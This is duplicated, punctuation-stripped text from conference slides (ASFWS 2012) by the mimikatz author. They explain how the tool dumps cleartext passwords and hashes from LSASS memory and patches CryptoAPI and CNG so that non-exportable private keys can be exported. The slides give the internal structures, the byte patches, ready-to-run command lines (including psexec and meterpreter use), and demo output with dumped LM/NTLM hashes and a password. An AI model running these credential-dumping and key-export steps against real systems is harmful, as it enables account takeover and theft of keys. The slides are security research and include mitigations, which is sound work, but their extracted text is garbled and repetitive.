07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
